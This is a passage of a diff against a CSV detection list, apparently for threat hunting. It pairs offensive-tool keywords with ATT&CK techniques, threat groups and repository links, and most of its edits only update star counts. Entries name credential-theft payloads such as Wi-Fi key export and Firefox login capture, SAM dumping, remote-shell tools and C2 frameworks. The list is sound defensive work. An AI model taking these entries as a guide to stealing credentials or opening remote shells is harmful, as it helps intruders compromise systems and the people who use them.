- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*stinger_server.exe*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" -"*stopdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*StopInveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stopdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*StopInveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-stop-keylogger*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" -"*stop-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*stormshadow07*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","9","866","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" -"*STRING firefox about:logins*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*String netsh wlan export profile key=clear*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*stop-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*stormshadow07*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","9","867","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" +"*STRING firefox about:logins*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*String netsh wlan export profile key=clear*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*strip_bof.ps1*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" -"*strip2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*strip2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*strip-bof -Path *","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*StrongLoader_x64.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*struts_ext_v2.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*su rootz*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" -"*subbrute*","offensive_tool_keyword","subbrute","SubBrute is a community driven project with the goal of creating the fastest. and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. as SubBrute does not send traffic directly to the targets name servers.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/TheRook/subbrute","1","1","N/A","N/A","10","3150","653","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z" -"*subdomain_takeovers.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*subdomains-100.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomains-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomains-10000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomains-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subbrute*","offensive_tool_keyword","subbrute","SubBrute is a community driven project with the goal of creating the fastest. and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. as SubBrute does not send traffic directly to the targets name servers.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/TheRook/subbrute","1","1","N/A","N/A","10","3151","653","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z" +"*subdomain_takeovers.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*subdomains-100.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-10000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-top1million-110000.txt*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*subdomains-top1million-20000.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*subdomains-uk-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomains-uk-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomain-wordlist.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*subdomains-top1million-20000.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*subdomains-uk-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-uk-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomain-wordlist.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*subfinder -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*subfinder -silent -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*subfinder --silent*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*subfinder*","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/subfinder/subfinder","1","0","N/A","N/A","10","8298","1128","2023-10-02T15:13:41Z","2018-03-31T09:44:57Z" +"*subfinder*","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/subfinder/subfinder","1","0","N/A","N/A","10","8302","1128","2023-10-02T15:13:41Z","2018-03-31T09:44:57Z" "*sublist3r -v -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Sublist3r*","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","10","8697","2020","2023-10-01T21:58:10Z","2015-12-15T00:55:25Z" +"*Sublist3r*","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","10","8700","2020","2023-10-01T21:58:10Z","2015-12-15T00:55:25Z" "*Suborner.exe*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*Suborner-master.zip*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" -"*Successfully connected* spawning shell?*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*Successfully connected* spawning shell?*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" "*Successfully cracked account password*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*Successfully dumped SAM and SYSTEM*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense 